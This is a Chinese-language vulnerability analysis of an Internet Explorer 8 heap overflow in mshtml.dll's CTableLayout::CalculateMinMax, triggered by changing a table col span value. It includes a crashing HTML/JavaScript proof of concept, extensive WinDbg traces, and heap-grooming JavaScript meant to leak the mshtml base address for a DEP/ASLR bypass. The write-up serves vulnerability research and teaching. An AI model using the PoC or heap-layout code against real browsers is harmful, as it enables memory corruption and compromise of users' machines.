文章目录
-
- 漏洞描述
- IE浏览器组件介绍
- 分析环境
- POC
- 漏洞分析
- 漏洞利用
- 参考资料
漏洞描述
该IE浏览器漏洞的成因在mshtml.dll这个模块的CTableLayout::CalculateMinMax函数里,程序在执行时会以HTML代码中的元素span属性作为循环控制次数向堆中写入数据。如果此span值设置不当,那么就会引发堆溢出问题。
IE浏览器组件介绍
Internet Explorer体系结构的关键是使用组件对象模型(COM),它控制所有的组件的交互,并实现组件的重用和扩展性。下图说明了Internet Explorer的主要组件。
- IExplore.exe位于顶层,是IExplore.exe的可执行文件,依赖于Internet Explorer的其他组件来完成渲染 导航 协议实现等工作
- Browseui.dll提供Internet Explorer的用户界面,此dll包括Internet Explorer地址栏 状态栏 菜单栏等
- Shdocvw.dll提供导航和历史等功能,此dll公开ActiveX控件接口
- Mshtml.dll是Internet Explorer的核心,它负责HTML和CSS解析
- Urlmon.dll提供MIME处理和代码下载功能
- WinInet.dll是Windows Internet协议处理程序。它实现了HTTP和FTP协议及缓存管理
分析环境
| 环境 | 版本 |
|---|---|
| 虚拟机 | Win7 x86 |
| IE浏览器 | 8.0 |
| 调试器 | windbg |
POC
<html>
<body><table style="table-layout:fixed" ><col id="132" width="41" span="6" >  </col></table><script>function over_trigger() {
var obj_col = document.getElementById("132");obj_col.width = "42765";obj_col.span = 666;}setTimeout("over_trigger();",1);</script>
</body>
</html>
上述代码的功能比较清晰,最开始创建时span属性值为6,而后通过js中的over_trigger函数将其动态更新为666(这个值可以是任意的 只要能保证溢出就行)
漏洞分析
将poc保存为html文件并双击打开,会弹出阻止提示,此时用windbg附加IE进程
附加列表中会有两个IE进程,选择后一个,即当前选项卡对应的子进程,接着我们设置如下几个断点
0:012> bp mshtml!CTableLayout::CalculateMinMax
0:012> bp mshtml!_HeapRealloc
0:012> bp mshtml!CTableCol::GetAAspan
漏洞成因是在CTableLayout::CalculateMinMax这个函数中,所以这个地方肯定要下个断点,又因为是堆溢出,所以在_HeapRealloc函数也来个断点。最后CTableCol::GetAAspan函数是用来获取Span属性值的。
0:012> bd 1 2
0:012> bl0 e 6bcca078 0001 (0001) 0:**** mshtml!CTableLayout::CalculateMinMax1 d 6bd7d7a5 0001 (0001) 0:**** mshtml!_HeapRealloc2 d 6bc4a6cb 0001 (0001) 0:**** mshtml!CTableCol::GetAAspan
接着我们暂时禁用掉1和2两个断点,输入g命令运行,在IE中允许阻止的内容,弹出警告直接点击确定
0:012> g
ModLoad: 6bb30000 6bbe2000 C:\Windows\System32\jscript.dll
Breakpoint 0 hit
eax=ffffffff ebx=004899c0 ecx=00412802 edx=ffffffff esi=00000000 edi=0245c334
eip=6891a078 esp=0245c0d8 ebp=0245c2f0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableLayout::CalculateMinMax:
6891a078 8bff mov edi,edi
回到windbg可以看到程序第一次在CTableLayout::CalculateMinMax函数入口断了下来,这是处理最开始创建时span值为6的情况
0:005> kb
ChildEBP RetAddr Args to Child
0245c0d4 6891a6b8 004899c0 0245c368 00000000 mshtml!CTableLayout::CalculateMinMax
0245c2f0 68910879 0245c368 0245c334 00000001 mshtml!CTableLayout::CalculateLayout+0x276
0245c49c 68a1566c 0245d3b8 0245c6c8 00000000 mshtml!CTableLayout::CalcSizeVirtual+0x720
0245c5d4 68a118f9 004899c0 00000000 00000000 mshtml!CLayout::CalcSize+0x2b8
......
接着查看调用堆栈和CTableLayout::CalculateMinMax函数声明
void __thiscall CTableLayout::CalculateMinMax(CTableLayout *theTableLayoutObj, LPVOID lpUnknownStackBuffer);
我们主要关心CTableLayout *theTableLayoutObj这个变量,它是一个指针,由上面的kb命令可知其值为004899c0
接着 查看一下004899c0的内容,68819aa0为vftable的值,00000006为span属性的值,最右边的0为申请的堆空间的起始地址,目前还没分配所以为NULL
0:005> be 1 2
0:005> bl0 e 6891a078 0001 (0001) 0:**** mshtml!CTableLayout::CalculateMinMax1 e 689cd7a5 0001 (0001) 0:**** mshtml!_HeapRealloc2 e 6889a6cb 0001 (0001) 0:**** mshtml!CTableCol::GetAAspan
接着启用1和2号断点
0:005> g
Breakpoint 1 hit
eax=00000000 ebx=00000000 ecx=000000a8 edx=00000000 esi=00489a5c edi=00489a50
eip=689cd7a5 esp=0245c00c ebp=0245c024 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!_HeapRealloc:
689cd7a5 8bff mov edi,edi
输入g命令运行,程序断在mshtml!_HeapRealloc函数开头。
程序申请了堆空间用于保存column的样式信息,每个样式信息占0x1C个字节,有多少个样式信息由span属性值来决定。
由于poc中span属性值为6,因此这里申请的堆空间的大小为0x1C*6=0xA8,即_HeapRealloc函数断下后ecx寄存器的值
0:005> gu
eax=00000000 ebx=00000000 ecx=775a5dd3 edx=004b6657 esi=00489a5c edi=00489a50
eip=689e34e2 esp=0245c014 ebp=0245c024 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CImplAry::EnsureSizeWorker+0xa1:
689e34e2 8bd8 mov ebx,eax
接着执行gu命令执行到返回,_HeapRealloc函数执行完成之后,再查看CTableLayout *theTableLayoutObj这个变量的值
0:005> dd 004899c0 L30
004899c0 68819960 00464528 00439648 689ce3b8
004899d0 00000001 00000000 0108080d ffffffff
004899e0 00000000 00000000 00000000 ffffffff
004899f0 00017700 0000b478 00000000 00000000
00489a00 00000000 00412802 00000000 00000000
00489a10 00000000 00000006 00000000 ffffffff
00489a20 00000000 ffffffff 6881a594 00000004
00489a30 00000004 00475ed8 6881a594 00000018
00489a40 00000006 004a3660 00000000 00000000
00489a50 6881a594 00000000 00000000 004b6658
00489a60 00000000 00000000 00000000 00000000
00489a70 00000000 00000000 00000000 00000000
发现此时原来堆空间的起始地址由NULL变成了004b6658了
0:005> g
Breakpoint 2 hit
eax=00460a88 ebx=004899c0 ecx=00000034 edx=00000006 esi=004b6700 edi=00460a88
eip=6889a6cb esp=0245c02c ebp=0245c0d4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableCol::GetAAspan:
6889a6cb 8bff mov edi,edi
0:005> gu
eax=00000006 ebx=004899c0 ecx=00000002 edx=004312a8 esi=004b6700 edi=00460a88
eip=68aaf31f esp=0245c030 ebp=0245c0d4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x3ac:
68aaf31f 3de8030000 cmp eax,3E8h
继续运行程序会在CTableCol::GetAAspan处断下来,也就是获取span值作为写入样式信息时循环的控制次数,函数结果保存在eax中,此时eax的值为6
0:005> ba w1 004b6658
0:005> bl0 e 6891a078 0001 (0001) 0:**** mshtml!CTableLayout::CalculateMinMax1 e 689cd7a5 0001 (0001) 0:**** mshtml!_HeapRealloc2 e 6889a6cb 0001 (0001) 0:**** mshtml!CTableCol::GetAAspan3 e 004b6658 w 1 0001 (0001) 0:****
0:005> g
Breakpoint 3 hit
eax=00010048 ebx=00001004 ecx=004b6670 edx=00000010 esi=004b6658 edi=004b6670
eip=68c40a49 esp=0245c014 ebp=0245c01c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CTableColCalc::AdjustForCol+0x2f:
68c40a49 eb2a jmp mshtml!CTableColCalc::AdjustForCol+0x5b (68c40a75)
再来看下程序向申请的堆空间写入样式信息的过程,我们在堆空间的起始地址下断,接着输入g命令运行,断点断下。
从poc中可以看到此时对应的width属性值为41,004899c0处写入的内容就为width值41*100=0x00001004,也就是断点断下时候ebx的值。当断点断下时0x1C个字节的信息都已写入完成,我们再单步往下跟一下
0:005> p
eax=00010048 ebx=00001004 ecx=004b6670 edx=00000010 esi=004b6658 edi=004b6670
eip=68c40a75 esp=0245c014 ebp=0245c01c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CTableColCalc::AdjustForCol+0x5b:
68c40a75 5f pop edi
......
0:005>
eax=00010048 ebx=004899c0 ecx=004b6670 edx=00000010 esi=004b6658 edi=00000001
eip=68aaf47a esp=0245c030 ebp=0245c0d4 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CTableLayout::CalculateMinMax+0x558:
68aaf47a ff45ec inc dword ptr [ebp-14h] ss:0023:0245c0c0=00000000
0:005>
eax=00010048 ebx=004899c0 ecx=004b6670 edx=00000010 esi=004b6658 edi=00000001
eip=68aaf47d esp=0245c030 ebp=0245c0d4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x55b:
68aaf47d 8b45ec mov eax,dword ptr [ebp-14h] ss:0023:0245c0c0=00000001
0:005>
eax=00000001 ebx=004899c0 ecx=004b6670 edx=00000010 esi=004b6658 edi=00000001
eip=68aaf480 esp=0245c030 ebp=0245c0d4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x55e:
68aaf480 8345dc1c add dword ptr [ebp-24h],1Ch ss:0023:0245c0b0=00000000
0:005>
eax=00000001 ebx=004899c0 ecx=004b6670 edx=00000010 esi=004b6658 edi=00000001
eip=68aaf484 esp=0245c030 ebp=0245c0d4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x562:
68aaf484 3b4510 cmp eax,dword ptr [ebp+10h] ss:0023:0245c0e4=00000006
可以看到出现了inc+cmp的组合,可以猜想这应该就是控制堆空间写入样式信息的循环了。
这几条汇编指令的意思就是[ebp-14h]的值每次增加1,即每次循环后递增,[ebp-24h]对应的值每次加0x1C,即每次加一个样式信息的字节数,最后当前的循环次数和[ebp+10h]对应的值比较
0:005> dd [ebp+10h] L1
0245c0e4 00000006
[ebp+10h]是span的属性值。接下来我们来看下通过js脚本动态更新span属性值后,也就是span值变成666时程序第二次在CTableLayout::CalculateMinMax函数入口断下后是个什么情形,理论上是要重新分配空间的,毕竟要多写入660个样式信息,而后再获取此时span的值作为循环控制次数,最后才向堆空间写入样式信息。
我们来到程序此时断下来的地方,顺便看下之前确实是写入了6个样式信息
0:005> bd 1 2 3
0:005> bl0 e 6891a078 0001 (0001) 0:**** mshtml!CTableLayout::CalculateMinMax1 d 689cd7a5 0001 (0001) 0:**** mshtml!_HeapRealloc2 d 6889a6cb 0001 (0001) 0:**** mshtml!CTableCol::GetAAspan3 d 004b6658 w 1 0001 (0001) 0:****
0:005> g
Breakpoint 0 hit
eax=ffffffff ebx=004899c0 ecx=00402c02 edx=ffffffff esi=00000000 edi=0245bb4c
eip=6891a078 esp=0245b8f0 ebp=0245bb08 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableLayout::CalculateMinMax:
6891a078 8bff mov edi,edi
0:005> kb L3
ChildEBP RetAddr Args to Child
0245b8ec 6891a6b8 004899c0 0245bb80 00000000 mshtml!CTableLayout::CalculateMinMax
0245bb08 68910879 0245bb80 0245bb4c 00000001 mshtml!CTableLayout::CalculateLayout+0x276
0245bcb4 68a1566c 0245d328 0245bee0 00000000 mshtml!CTableLayout::CalcSizeVirtual+0x720
0:005> dd 004899c0 L30
004899c0 68819960 00464528 00439648 689ce3b8
004899d0 00000001 00000000 010a081d 00002580
004899e0 00000000 00000000 0041da18 ffffffff
004899f0 00017700 0000b478 00000708 00000001
00489a00 00000000 00402c02 00000000 00000000
00489a10 00000000 00000006 ffffffff ffffffff
00489a20 ffffffff ffffffff 6881a594 00000004
00489a30 00000004 00475ed8 6881a594 00000018
00489a40 00000006 004a3660 00000000 00000000
00489a50 6881a594 00000018 00000006 004b6658
00489a60 00000000 00000000 00000000 00000000
00489a70 00000000 00000000 00000000 00000000
继续往下应该是要分配堆空间了,启用_HeapRealloc断点,g命令运行
0:005> be 1 2
0:005> bl0 e 6891a078 0001 (0001) 0:**** mshtml!CTableLayout::CalculateMinMax1 e 689cd7a5 0001 (0001) 0:**** mshtml!_HeapRealloc2 e 6889a6cb 0001 (0001) 0:**** mshtml!CTableCol::GetAAspan3 d 004b6658 w 1 0001 (0001) 0:****
0:005> g
Breakpoint 2 hit
eax=00460a88 ebx=004899c0 ecx=00000034 edx=00000006 esi=004b6700 edi=00460a88
eip=6889a6cb esp=0245b844 ebp=0245b8ec iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableCol::GetAAspan:
6889a6cb 8bff mov edi,edi
0:005> gu
eax=0000029a ebx=004899c0 ecx=00000002 edx=004312a8 esi=004b6700 edi=00460a88
eip=68aaf31f esp=0245b848 ebp=0245b8ec iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x3ac:
68aaf31f 3de8030000 cmp eax,3E8h
但我们却发现程序跳过了堆空间的分配过程,错误的认为之前分配的空间已经足够而转去直接获取控制循环次数的span属性值eax,CTableCol::GetAAspan函数执行完时eax的值为0x29a,即十进制的666
接下来和前面一样是写入样式信息的过程,不过这次是对只能容纳6个样式信息的堆空间写入了666个样式信息,从而引发了堆溢出
0:005> be 3
0:005> bd 1 2
0:005> bl0 e 6891a078 0001 (0001) 0:**** mshtml!CTableLayout::CalculateMinMax1 d 689cd7a5 0001 (0001) 0:**** mshtml!_HeapRealloc2 d 6889a6cb 0001 (0001) 0:**** mshtml!CTableCol::GetAAspan3 e 004b6658 w 1 0001 (0001) 0:****
0:005> g
Breakpoint 3 hit
eax=04141148 ebx=00414114 ecx=004b6670 edx=00004141 esi=004b6658 edi=004b6670
eip=68c40a49 esp=0245b82c ebp=0245b834 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CTableColCalc::AdjustForCol+0x2f:
68c40a49 eb2a jmp mshtml!CTableColCalc::AdjustForCol+0x5b (68c40a75)
我们启用堆空间的断点,让断点在堆空间写入的时候断下,接着一直单步
0:005>
eax=04141148 ebx=004899c0 ecx=004b6670 edx=00004141 esi=004b6658 edi=00000001
eip=68aaf47a esp=0245b848 ebp=0245b8ec iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CTableLayout::CalculateMinMax+0x558:
68aaf47a ff45ec inc dword ptr [ebp-14h] ss:0023:0245b8d8=00000000
0:005>
eax=04141148 ebx=004899c0 ecx=004b6670 edx=00004141 esi=004b6658 edi=00000001
eip=68aaf47d esp=0245b848 ebp=0245b8ec iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x55b:
68aaf47d 8b45ec mov eax,dword ptr [ebp-14h] ss:0023:0245b8d8=00000001
0:005>
eax=00000001 ebx=004899c0 ecx=004b6670 edx=00004141 esi=004b6658 edi=00000001
eip=68aaf480 esp=0245b848 ebp=0245b8ec iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x55e:
68aaf480 8345dc1c add dword ptr [ebp-24h],1Ch ss:0023:0245b8c8=00000000
0:005>
eax=00000001 ebx=004899c0 ecx=004b6670 edx=00004141 esi=004b6658 edi=00000001
eip=68aaf484 esp=0245b848 ebp=0245b8ec iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x562:
68aaf484 3b4510 cmp eax,dword ptr [ebp+10h] ss:0023:0245b8fc=0000029a
接着查看ebp+10h的值
0:005> dd ebp+10h L1
0245b8fc 0000029a
可以看到ebp-0x10对应此时span属性值为0x29a,所以程序最终将会执行666次循环,堆溢出发生后程序将继续运行,从而造成内存访问违规,导致IE浏览器崩溃
总结:
- 程序根据span的属性值申请堆空间
- 获取span的属性值并循环向堆空间写入样式信息
- 通过js脚本动态更新span属性值
- 此时程序跳过分配堆空间的过程 错误的认为之前分配的空间已经足够 转而去直接获取控制循环次数的span属性值
- 向堆空间写入样式信息 引发堆溢出 导致浏览器崩溃
漏洞利用
要利用堆溢出漏洞,需要先确定溢出时用于覆盖的内容和位置。为了绕过DEP和ASLR的保护,VUPEN通过溢出漏洞覆盖BSTR字符串长度的值,然后通过JavaScript读取CButtonLayout虚表指针,通过固定偏移量找到mshtml.dll基址,用它来构造ROP指令,以此绕过DEP和ASLR
为了绕过DEP和ASLR,首先需要构造堆布局以便将mshtml.dll基址泄露出来,下面的代码就是用于构造堆布局的
<div id="test"></div><script language='javascript'>var leak_index = -1;var dap = "EEEE";while ( dap.length < 480 ) dap += dap;var padding = "AAAA";while ( padding.length < 480 ) padding += padding;var filler = "BBBB";while ( filler.length < 480 ) filler += filler;//sprayvar arr = new Array();var rra = new Array();var div_container = document.getElementById("test");div_container.style.cssText = "display:none";for (var i=0; i < 500; i+=2) {
// Erra[i] = dap.substring(0, (0x100-6)/2);// S, bstr = Aarr[i] = padding.substring(0, (0x100-6)/2);// A, bstr = Barr[i+1] = filler.substring(0, (0x100-6)/2);// Bvar obj = document.createElement("button");div_container.appendChild(obj);}for (var i=200; i<500; i+=2 ) {
rra[i] = null;CollectGarbage();}</script>
上面的JavaScript代码首先创建0x100大小的字符串"EEEE",接着是同等大小的"AAAA"和"BBBB",最后又创建了一个button元素,即CButtonLayout对象结构。
上面的字符串在IE浏览器中都是一段BSTR字符串,即Basic String的简称,它是包含长度前缀和NULL终止符的Unicode字符串,所以字符数是字节数的一半,这也是前面代码分配字符串除以2的原因。
接着,再从rra数组中间位置开始间隔释放内存,腾出空间后供后面分配0x100大小的对象时能够被占用到。
最后,构造出来的堆空间布局如下:
[外链图片转存失败(img-Jj8bWphb-1565927056165)(assets/1565860060218.png)]
释放的位置就是为了在分配漏洞堆块vulheap时能够占用到这些释放位置中的一个,当溢出时就可以覆盖到后面的AAAA和BBBB了。
<table style="table-layout:fixed" ><col id="0" width="41" span="9" >  </col></table>
<table style="table-layout:fixed" ><col id="1" width="41" span="9" >  </col></table>
<table style="table-layout:fixed" ><col id="2" width="41" span="9" >  </col></table>
<table style="table-layout:fixed" ><col id="3" width="41" span="9" >  </col></table>
接下来,创建一连串的col元素,共132个以占用前面释放的"EEEE"位置
为了确定所分配的vulheap是否占用到已释放的"EEEE"位置,我们先在释放内存的函数CollectGarbage上下断点,它对应的是jscript.dll中的JsCollectGarbage。
[外链图片转存失败(img-snGZd9hA-1565927056166)(assets/1565921432705.png)]
先通过Windbg加载IE进程
0:012> .childdbg 1
Processes created by the current process will be debugged
并执行.childdbg开启子进程调试
0:012> sxe ld:jscript
因为刚开始IE还没有加载jscript.dll,所以先设置加载jscript.dll时断下
0:012> g
ModLoad: 6be10000 6bec2000 C:\Windows\System32\jscript.dll
eax=00000000 ebx=00000000 ecx=00000074 edx=004c0e94 esi=7ffd9000 edi=022ac19c
eip=775970b4 esp=022ac0b4 ebp=022ac108 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!KiFastSystemCallRet:
775970b4 c3 ret
接着输入g命令,点击运行阻止的风险,此时程序断在jscript.dll
0:005> bp jscript!JsCollectGarbage
断下后再对JsCollectGarbage函数下断。因为释放堆块最后都会调用到底层函数ntdll!RtlFreeHeap,所以它的第三个参数即为被释放的堆地址,我们可以对其下断,然后记录并输出每个释放的堆块地址。
0:005> bd 0
0:005> bl0 d 6be983d3 0001 (0001) 0:**** jscript!JsCollectGarbage0:005> bu ntdll!RtlFreeHeap ".echo free heap;db poi(esp+c) l10;g"
下断前可以先把JsCollectGarbage断点禁掉,避免程序多次被中断
分配vulheap堆块的行为是CTableLayout::CalculateMinMa中调用CImplAry::EnsureSizeWorker函数分配的,并且分配的地址保存在[ebx+9c]中,调用完CImplAry::EnsureSizeWorker函数的下一条指令位于mshtml!CTableLayout::CalculateMinMax+0x16d,可以如此下断得到vulheap地址:
0:005> bu mshtml!CTableLayout::CalculateMinMax+0x16d ".echo vulheap;dd poi(ebx+9c) l4;g"
由于日志输出信息比较多,可以将日志保存在文档中
0:005> .logopen c:\log.txt
Opened log file 'c:\log.txt'
记录完毕可以使用.logclose关闭
0:005> .logclose
Closing open log file c:\log.txt
保存之后,最后一个vueheap就是我们要的’
free heap
083f2ef0 e8 d2 56 69 00 0d 4c 00-d0 62 83 04 38 04 4c 00 ..Vi..L..b..8.L.
free heap
00000000 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
free heap
00000000 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
free heap
00000000 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
(3f4.c0): Stack overflow - code c00000fd (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000009 ebx=083f5d20 ecx=00000000 edx=00000009 esi=022ac580 edi=00000000
eip=694ba1b2 esp=020b3000 ebp=022ac2ec iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
mshtml!CTableLayout::CalculateMinMax+0x175:
694ba1b2 50 push eax
另外为了确定虚表偏移,直接动态找一下吧
0:005> x mshtml!CButtonLayout::*
6956f069 mshtml!CButtonLayout::GetThemeClassId (<no parameter info>)
695ee9c5 mshtml!CButtonLayout::GetInsets (<no parameter info>)
69508690 mshtml!CButtonLayout::`vftable' = <no type information>
6959cf35 mshtml!CButtonLayout::GetAutoSize (<no parameter info>)
69785a7c mshtml!CButtonLayout::HitTestContent (<no parameter info>)
6955d2e3 mshtml!CButtonLayout::DrawClientBackground (<no parameter info>)
69509211 mshtml!CButtonLayout::Init (<no parameter info>)
6959cf35 mshtml!CButtonLayout::GetMultiLine (<no parameter info>)
696f1080 mshtml!CButtonLayout::s_layoutdesc = <no type information>
69785a6c mshtml!CButtonLayout::GetBtnHelper (<no parameter info>)
697858a7 mshtml!CButtonLayout::GetFocusShape (<no parameter info>)
696f1079 mshtml!CButtonLayout::GetLayoutDesc (<no parameter info>)
69785a07 mshtml!CButtonLayout::DoLayout (<no parameter info>)
6956f069 mshtml!CButtonLayout::GetWordWrap (<no parameter info>)
695084f8 mshtml!CButtonLayout::`vftable' = <no type information>
6955d2af mshtml!CButtonLayout::DrawClient (<no parameter info>)
695d36c1 mshtml!CButtonLayout::`scalar deleting destructor' (<no parameter info>)
697856e7 mshtml!CButtonLayout::DrawClientBorder (<no parameter info>)
695d36c1 mshtml!CButtonLayout::`vector deleting destructor' (<no parameter info>)
695eeb59 mshtml!CButtonLayout::GetDefaultSize (<no parameter info>)
奇怪的是,有两个虚表,这里我也不知道为什么……
此外看一下vulheap
1:026> db 03f2ae30 l101c
03f2ae30 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2ae40 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2ae50 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E.
03f2ae60 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H...........
03f2ae70 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E.
03f2ae80 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2ae90 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H...
03f2aea0 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2aeb0 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2aec0 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E.
03f2aed0 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H...........
03f2aee0 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E.
03f2aef0 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2af00 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H...
03f2af10 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2af20 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2af30 04 10 00 00 04 10 00 00-0c 61 81 04 00 00 00 00 .........a......
03f2af40 02 00 00 00 48 00 01 00-04 10 00 00 04 10 00 00 ....H...........
03f2af50 04 10 00 00 41 00 41 00-41 00 41 00 41 00 41 00 ....A.A.A.A.A.A.
03f2af60 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2af70 41 00 41 00 41 00 41 00-41 00 41 00 48 00 01 00 A.A.A.A.A.A.H...
03f2af80 04 10 00 00 04 10 00 00-04 10 00 00 41 00 41 00 ............A.A.
03f2af90 41 00 41 00 41 00 41 00-48 00 01 00 04 10 00 00 A.A.A.A.H.......
03f2afa0 04 10 00 00 04 10 00 00-41 00 41 00 41 00 41 00 ........A.A.A.A.
03f2afb0 41 00 41 00 48 00 01 00-04 10 00 00 04 10 00 00 A.A.H...........
03f2afc0 04 10 00 00 41 00 41 00-41 00 41 00 41 00 41 00 ....A.A.A.A.A.A.
03f2afd0 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2afe0 41 00 41 00 41 00 41 00-41 00 41 00 48 00 01 00 A.A.A.A.A.A.H...
03f2aff0 04 10 00 00 04 10 00 00-04 10 00 00 41 00 41 00 ............A.A.
03f2b000 41 00 41 00 41 00 41 00-48 00 01 00 04 10 00 00 A.A.A.A.H.......
03f2b010 04 10 00 00 04 10 00 00-41 00 41 00 41 00 41 00 ........A.A.A.A.
03f2b020 41 00 41 00 48 00 01 00-04 10 00 00 04 10 00 00 A.A.H...........
03f2b030 04 10 00 00 41 00 41 00-41 00 41 00 41 00 41 00 ....A.A.A.A.A.A.
03f2b040 48 00 01 00 41 00 00 00-20 10 d1 01 00 00 00 c2 H...A... .......
03f2b050 0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05 .a..............
03f2b060 fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00 ....B.B.B.B.B.B.
03f2b070 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b080 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b090 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b0a0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b0b0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b0c0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b0d0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b0e0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b0f0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b100 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b110 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b120 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b130 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b140 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b150 42 00 42 00 42 00 42 00-42 00 42 00 42 00 00 00 B.B.B.B.B.B.B...
03f2b160 05 10 d1 01 00 00 00 c2-c0 6a 81 04 00 00 00 00 .........j......
03f2b170 02 00 00 00 1c 00 02 05-f8 3a 8d 68 10 0b 37 01 .........:.h..7.
03f2b180 70 90 ef 03 90 3c 8d 68-01 00 00 00 00 00 00 00 p....<.h........
03f2b190 09 08 08 01 ff ff ff ff-00 00 00 00 00 00 00 00 ................
03f2b1a0 00 00 00 00 ff ff ff ff-80 00 00 00 ff ff ff ff ................
03f2b1b0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b1c0 00 00 00 00 24 00 00 00-20 00 00 00 00 00 00 00 ....$... .......
03f2b1d0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b1e0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b1f0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b200 00 00 00 00 00 00 00 00-00 00 00 00 28 b2 f2 03 ............(...
03f2b210 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
